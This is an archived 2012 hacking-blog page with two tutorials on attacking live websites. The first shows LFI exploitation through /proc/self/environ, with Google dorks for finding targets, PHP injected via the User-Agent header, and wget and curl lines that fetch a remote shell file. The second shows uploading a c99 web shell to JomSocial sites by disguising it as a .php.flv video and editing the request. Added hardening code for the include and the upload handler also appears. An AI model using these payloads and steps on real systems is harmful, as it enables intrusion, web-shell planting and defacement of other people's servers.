Thursday, August 30, 2012

LFI and Shell Upload with Tamper Data


Hello friends, today I'm publishing a tutorial on what LFI is and how to upload a shell with Tamper Data on an LFI-vulnerable website.

LFI means Local File Inclusion. It gives you access to read files on a website/server via your browser.
Previously I published a post on LFI; you can read it here






An LFI-vulnerable website URL looks like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code that makes it vulnerable looks like.

<?php
   // Vulnerable: the request parameter is passed to include() without any validation.
   if (isset($_GET['page']))
   {
      $file = $_GET['page'];
      include("pages/$file");
   }
   else
   {
      include("index.php");
   }
?>
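A hardened counterpart to the vulnerable include above, as an added example that is not part of the original post: the `page` value is used only as a lookup key into a fixed allowlist, so it never becomes part of a file path. `PAGES_DIR`, `ALLOWED_PAGES` and the page names are assumptions chosen for illustration.

```php
<?php
// Added example, not code from the original post.
// PAGES_DIR and the page names in ALLOWED_PAGES are assumptions for illustration.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the ?page= value to a file on disk, or return null if it is not allowed.
 * The request value is only ever a lookup key, never part of a path.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-string values are rejected outright.
    if ($requested !== null && !is_string($requested)) {
        return null;
    }
    $key = ($requested === null || $requested === '') ? 'home' : $requested;
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null; // "/etc/passwd", "/proc/self/environ" and "../x" all end here
    }
    // Defence in depth: the resolved file must still live under PAGES_DIR
    // (catches a symlink or a mistaken allowlist entry).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$key]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

With this in place a request header such as User-Agent can no longer reach `include`, because no request-controlled string selects the file.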
A few things you need for this method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnerable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now I'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper Data.


So after selecting a vulnerable website, check /etc/passwd.
Your page should come up with something that looks like this.



Great! Now you are sure that the website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look like this if the file exists.
Note: not all websites have it.

I'm interested in HTTP_USER_AGENT. Now I'm going to change our user agent to try to get data from the site by injecting code where our browser's user agent should be.


To do this, I am going to use Tamper Data. Once you have it installed, go to your options, and go to Tamper Data.



Now you will get a window that looks like this.



Your page must still be /proc/self/environ
Click Start Tamper, and refresh your page.


I'll try some code injection.
After you start tampering, you should see a window that looks like this





In the User-Agent field, type this 


<?php phpinfo();?>


Now the vulnerable website is loading,
you will see something like this if you did it correctly

Now we can execute code, so let's upload your shell.


Open Tamper Data again, click Start Tamper, and refresh the website. This time, in the User-Agent field, enter this


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this

It downloads the text file and renames it as a PHP file.
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


When you're done with that, you can access your shell directly by going to http://site/shell.php


If you are getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
Upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload your deface using the shell... check out the best deface pages here
When you are done, you have a shell, like this <3

Alternate Method:
Some websites take extra precautions to prevent attacks like these,
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load the website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
Your URL should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell is uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd

Wednesday, August 29, 2012

JomSocial ~ Joomla Shell Upload Vulnerability


Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site

& a Brain :)

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".

Getting Access to site:
1. Register a fake account.
2. Activate your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer. Please note that if you only see Add video from URL, that means the site is not vulnerable.
The reason for having created a file called "myshell.php.flv" is to trick the uploader into thinking that you are uploading an FLV file.

Uploading shell:

1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper Data will then ask if you want to tamper; uncheck continue to tamper, then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And you're in!
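The steps above depend on the extension being checked before the request is sent, while the server keeps whatever extension arrives in the request. A server-side upload handler that closes that gap, as an added example that is not JomSocial's own code; `UPLOAD_DIR`, the `video` field name and the accepted formats are assumptions for illustration.

```php
<?php
// Added example, not JomSocial code.
// Assumed: UPLOAD_DIR lies outside the web root, or PHP execution is disabled for it.
const UPLOAD_DIR = '/var/www/media-store';
const ALLOWED_VIDEO = [            // extension => MIME types accepted for it
    'flv' => ['video/x-flv'],
    'mp4' => ['video/mp4'],
    'avi' => ['video/x-msvideo', 'video/avi'],
];

/** Validate one $_FILES entry and store it; returns the stored name or null. */
function store_video_upload(array $upload): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_string($upload['name'] ?? null)
        || !is_uploaded_file($upload['tmp_name'] ?? '')) {
        return null;
    }
    // Check the name the server actually received, after any in-transit edit:
    // "myshell.php" has extension "php" and is refused here.
    $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_VIDEO)) {
        return null;
    }
    // Check the content as well: a PHP script named "x.flv" is not video/x-flv.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($upload['tmp_name']);
    if (!in_array($mime, ALLOWED_VIDEO[$ext], true)) {
        return null;
    }
    // Never reuse the client's file name; only the vetted extension survives.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($upload['tmp_name'], UPLOAD_DIR . '/' . $stored)
        ? $stored
        : null;
}

if (isset($_FILES['video']) && is_array($_FILES['video'])) {
    $name = store_video_upload($_FILES['video']);
    if ($name === null) {
        http_response_code(400);
        exit('Upload rejected');
    }
    echo 'Stored as ' . $name;
}
```

Serving the stored files from a directory where the web server does not execute PHP keeps a missed case from turning into code execution.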